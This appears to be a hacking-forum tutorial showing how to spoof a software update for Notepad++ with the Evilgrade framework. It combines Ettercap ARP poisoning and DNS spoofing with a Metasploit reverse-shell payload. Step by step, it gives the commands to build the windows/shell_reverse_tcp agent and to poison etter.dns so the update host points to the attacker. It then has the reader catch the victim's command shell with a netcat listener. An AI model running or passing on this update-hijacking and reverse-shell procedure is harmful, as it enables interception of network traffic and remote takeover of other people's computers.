Today ill explain how to use Evilgrade. Evilgrade is a modular framework that allows an attacker to take advantage of poorly implemented software upgrades. An attacker can use Evilgrade in combination with DNS spoofing or a MITM attack to spoof a software update and trick the victim computer into executing arbitrary code such as a Metasploit’s Payload. Currently, the Evilgrade framework supports the following software: Java plugin, Winzip, Winamp, MacOS, OpenOffices, iTunes, Linkedin Toolbar, Download Accelerator, notepad++, and speedbit. In this tut, i illustrate how to use Evilgrade with a DNS Spoofing attack to execute a reverse shell on a target computer.

My target will be my Winblows XP machine using Notepad++ on my own network.

First you will need to download Evilgrade from:
Code:
www.infobyte.com.ar
Once you have downloaded the file you need to decompress it:
Code:
BT ~ / tar zxvf lsr-evilgrade-1.0.0.tar.gz
Ok so navigate to the folder by:
Code:
BT ~ / cd lsr-evilgrade
Now to start Evilgrade you type:
Code:
./evilgrade
Now that your in Evilgrade you can have look at the modules you would look to spoof. You can do that by typing:
Code:
show modules
As you can see there are a few you can spoof, but today ill be using Notepad++.

Ok so you have picked your weapon.. err module? We now have to config that module. You can do this by typing:
Code:
config notepadplus
NOTE: If your not using Notepad++ put the name of the module you would like to configure.

So now to see all the options for that module you type:
Code:
show options
At this point you can see all the options of that module. You can see the virtual host and the agent to inject.

Ok so now we have gotten this far. Have i lost you? Good. The next step is choosing what payload to use with the agent.
You will have to open up a new shell and navigate to the Metasploit directory to see what we can use. You can do that by following the commands below:
Code:
BT ~ / cd /pentest/exploits/framework3
BT ~ / ./msfpayload
Now find what payload you wish to use and remember where it is located.
I will be using windows/shell_reverse_tcp
So now we go back the the Evilgrade shell and set the agent. To set the agent follow the commands below:
Code:
set agent '["/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp LHOST=ip LHOST=port X > <%OUT%>/tmp/a.exe<%OUT%>"]'
NOTE:LHOST is your IP and LPORT is the port you want it to connect to.
What that does is when the victim uses the update it will connect back to you.

So now the payload and update is all set. The next thing we want to do is DNS spoofing. In order to complete this you need some background knowledge to DNS spoofing.
So now we have to edit the etter.dns file. You can do that by follow these commands:
Code:
BT ~ / cd /usr/local/share/ettercap
BT ~ / nanoetter.dns
Delete all the junk in the file that wont be being used. It should look like this after you are done.
NOTE: Remember im useing the Nopepad++ module, this will be different if your using another module.
Code:
  GNU nano 2.0.6                         File: etter.dns                                                Modified

#                                                                          #
# or for WINS query:                                                       #
#    workgroup WINS 127.0.0.1                                              #
#    PC*       WINS 127.0.0.1                                              #
#                                                                          #
# NOTE: the wildcarded hosts can't be used to poison the PTR requests      #
#       so if you want to reverse poison you have to specify a plain       #
#       host. (look at the www.microsoft.com example)                      #
#                                                                          #
############################################################################

################################
 notepadplus.sourceforge.net A yourIP
Now were going to want to start Ettercap. While still in the shell you edited the etter.dns in, type the follow:
Code:
ettercap -G
Now that were in Ettercap we need to:
Sniff (eth0)
Scan for hosts
Set the targets: Default gateway + target pc
Use a MITM attack, ARP poisioning
Go to Plugins and use dns_spoof
Start sniffing

So now open another shell so we can listen in on the port that the module will open once the victim has download the "update"
To listen on the port type the following:
Code:
nc -l -v -p port
NOTE:The port number has to be the port number you set up with the module.

Now go back to Evilgrade and type the following:
Code:
start
Now you have to wait for the victim to accept the update when they open up the program that your module is for. Once they update the program you will see in the shell that you typed the commands in to listen for that port you will then be into their CMD.

I hope this has been a help in anyway, if you have any subjections to what i should add or change, please do hesitate to send me a pm about it.

Thanks, Jesse.